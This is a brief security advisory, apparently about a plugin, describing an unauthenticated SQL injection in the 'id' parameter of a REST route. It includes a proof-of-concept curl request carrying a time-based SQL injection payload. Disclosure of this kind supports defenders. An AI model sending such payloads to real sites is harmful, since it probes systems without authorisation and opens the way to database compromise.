The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection
curl 'http://example.com/?rest_route=/olistener/new' --data '{"id":" (SELECT SLEEP(3))#"}' -H 'content-type: application/json'